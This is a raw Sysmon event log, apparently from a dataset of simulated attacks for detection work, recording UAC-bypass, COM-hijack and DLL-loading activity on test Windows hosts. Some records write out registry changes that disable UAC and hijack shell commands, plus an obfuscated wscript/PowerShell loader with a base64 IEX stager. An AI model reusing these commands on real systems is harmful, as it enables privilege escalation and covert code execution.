Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-07-19T14:46:20.787648Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: regsvcser.Bypass - EventType: SetValue - Image: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe" - ProcessGuid: 747F3D96-D7BB-5D31-0000-0010D5092A00 - ProcessId: 1060 - RuleName: Persistence - COM Hijack - TargetObject: "HKCR\\WOW6432Node\\CLSID\\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\\InprocServer32\\0.0.0.0\\Class" - UtcTime: "2019-07-19 14:46:20.729" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 3626 - Execution_attributes: - ProcessID: 2796 - ThreadID: 3592 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-07-19T14:46:20.830945Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51D0-5F93-0000-001036A15B00 - ProcessId: 3396 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:57:36.375" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424060 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:57:36.375368Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51D0-5F93-0000-001036A15B00 - ProcessId: 3396 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:57:36.375" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424064 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:57:36.376024Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51FD-5F93-0000-00103B425E00 - ProcessId: 7504 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:58:21.922" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424244 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:58:21.930237Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51FD-5F93-0000-00103B425E00 - ProcessId: 7504 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:58:21.922" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424248 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:58:21.931190Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" " - Company: Microsoft Corporation - CurrentDirectory: "C:\\Users\\IEUser\\" - Description: Microsoft Management Console - FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) - Hashes: "SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1" - Image: "C:\\Windows\\System32\\mmc.exe" - IntegrityLevel: High - LogonGuid: 365ABB72-AB27-5CB8-0000-002021CA0000 - LogonId: "0xca21" - ParentCommandLine: "\"C:\\Windows\\system32\\eventvwr.exe\" " - ParentImage: "C:\\Windows\\System32\\eventvwr.exe" - ParentProcessGuid: 365ABB72-AC60-5CB8-0000-001002B30800 - ParentProcessId: 3904 - ProcessGuid: 365ABB72-AC60-5CB8-0000-001037BA0800 - ProcessId: 3900 - Product: Microsoft® Windows® Operating System - RuleName: "technique_id=T1088,technique_name=Bypass User Account Control" - TerminalSessionId: 1 - User: "IEWIN7\\IEUser" - UtcTime: "2019-04-18 16:57:04.500" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 1 - EventRecordID: 15 - Execution_attributes: - ProcessID: 3192 - ThreadID: 3288 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-04-18T16:57:04.681038Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - EventType: CreateKey - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: DFAE8213-70EB-5CDD-0000-0010F66D0A00 - ProcessId: 3788 - RuleName: "technique_id=T1088,technique_name=Bypass User Account Control" - TargetObject: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system" - UtcTime: "2019-05-16 14:17:15.758" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: DC1.insecurebank.local - Correlation: ~ - EventID: 12 - EventRecordID: 18618 - Execution_attributes: - ProcessID: 1780 - ThreadID: 2204 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 12 - TimeCreated_attributes: - SystemTime: "2019-05-16T14:17:15.763712Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000000) - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: DFAE8213-70EB-5CDD-0000-0010F66D0A00 - ProcessId: 3788 - RuleName: "technique_id=T1088,technique_name=Bypass User Account Control" - TargetObject: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA" - UtcTime: "2019-05-16 14:17:15.758" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: DC1.insecurebank.local - Correlation: ~ - EventID: 13 - EventRecordID: 18619 - Execution_attributes: - ProcessID: 1780 - ThreadID: 2204 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-05-16T14:17:15.763712Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Windows\\system32\\" - Description: Microsoft ® Windows Based Script Host - FileVersion: 5.812.10240.16384 - Hashes: "SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C" - Image: "C:\\Windows\\System32\\wscript.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-F419-5D53-0000-002026910200 - LogonId: "0x29126" - ParentCommandLine: "\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}" - ParentImage: "C:\\Windows\\System32\\rundll32.exe" - ParentProcessGuid: 747F3D96-FBCA-5D53-0000-0010B8664100 - ParentProcessId: 2476 - ProcessGuid: 747F3D96-FBCA-5D53-0000-001036784100 - ProcessId: 2876 - Product: Microsoft ® Windows Script Host - RuleName: "" - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-08-14 12:17:14.661" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 10675 - Execution_attributes: - ProcessID: 2004 - ThreadID: 4480 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-08-14T12:17:14.893930Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Windows\\system32\\" - Description: Microsoft ® Windows Based Script Host - FileVersion: 5.812.10240.16384 - Hashes: "SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C" - Image: "C:\\Windows\\System32\\wscript.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-F419-5D53-0000-002026910200 - LogonId: "0x29126" - ParentCommandLine: "C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding" - ParentImage: "C:\\Windows\\explorer.exe" - ParentProcessGuid: 747F3D96-F639-5D53-0000-001092EE2600 - ParentProcessId: 6000 - ProcessGuid: 747F3D96-F639-5D53-0000-0010B0FC2600 - ProcessId: 8180 - Product: Microsoft ® Windows Script Host - RuleName: "" - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-08-14 11:53:29.768" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 10662 - Execution_attributes: - ProcessID: 2004 - ThreadID: 4480 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-08-14T11:53:30.022856Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 11:23:15.519" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-6EA3-5D45-0000-0010204DE100 - ProcessId: 7984 - RuleName: PrivEsc - UAC Bypass UACME 30 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll" - UtcTime: "2019-08-03 11:23:15.519" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5401 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T11:23:15.560614Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: Yokai Ltd. - Description: Yamabiko Proxy - FileVersion: 2.5.1.0 - Hashes: "SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B" - Image: "C:\\Windows\\System32\\sysprep\\sysprep.exe" - ImageLoaded: "C:\\Windows\\System32\\sysprep\\cryptbase.dll" - ProcessGuid: 365ABB72-28D3-5CDA-0000-00106DC31300 - ProcessId: 3068 - Product: Yamabiko - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-14 02:32:51.728" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 17728 - Execution_attributes: - ProcessID: 2024 - ThreadID: 2004 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-14T02:32:51.831307Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC" - Image: "C:\\Windows\\System32\\migwiz\\migwiz.exe" - ImageLoaded: "C:\\Windows\\System32\\migwiz\\CRYPTBASE.dll" - ProcessGuid: 365ABB72-FC61-5CD6-0000-0010141A1300 - ProcessId: 3240 - Product: "?" - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-11 16:46:26.000" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 15975 - Execution_attributes: - ProcessID: 2008 - ThreadID: 1992 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-11T16:46:26.203657Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: (Empty) - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B07F-5D46-0000-001031A90F04 - ProcessId: 1768 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute" - UtcTime: "2019-08-04 10:16:31.415" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5944 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:31.476803Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B07F-5D46-0000-0010F1B20F04 - ProcessId: 2444 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 10:16:31.572" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5946 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:31.609571Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B097-5D46-0000-0010E1321204 - ProcessId: 1960 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 10:16:55.415" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5953 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:55.441262Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-B097-5D46-0000-0010E7381204 - ProcessId: 3444 - RuleName: PrivEsc - UAC bypass UACME-56 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute" - UtcTime: "2019-08-04 10:16:55.619" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5955 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T10:16:55.643799Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " - Company: "?" - CurrentDirectory: "C:\\Users\\IEUser\\Downloads\\" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=23434874C017F3987BA5FD7B9ABB5FCCF1D62231,MD5=4C2E8A86ADAF45774C0A0CB52F25C04B,SHA256=81C898300A19FD8F92297E4BE8BEC8C43E9420B42E93167D375FA1512654EA23,IMPHASH=1A0963EBB2F7EC4A6BDCCD537C92C853" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-D21D-5D3C-0000-0020DD5C2300 - LogonId: "0x235cdd" - ParentCommandLine: "C:\\Windows\\Explorer.EXE" - ParentImage: "C:\\Windows\\explorer.exe" - ParentProcessGuid: 747F3D96-D21F-5D3C-0000-0010531C2400 - ParentProcessId: 4536 - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - Product: "?" - RuleName: "" - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-07-27 22:43:41.388" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 4723 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.424255Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-07-27 22:43:41.627" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: ProvEsc - UAC Bypass Mocking Trusted WinFolders - TargetFilename: "C:\\Windows \\System32" - UtcTime: "2019-07-27 22:43:41.627" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 4724 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.755254Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-07-27 22:43:41.627" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: ProvEsc - UAC Bypass Mocking Trusted WinFolders - TargetFilename: "C:\\Windows \\System32\\winSAT.exe" - UtcTime: "2019-07-27 22:43:41.627" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 4725 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.755406Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-07-27 22:43:41.641" - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: ProvEsc - UAC Bypass Mocking Trusted WinFolders - TargetFilename: "C:\\Windows \\System32\\WINMM.dll" - UtcTime: "2019-07-27 22:43:41.641" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - 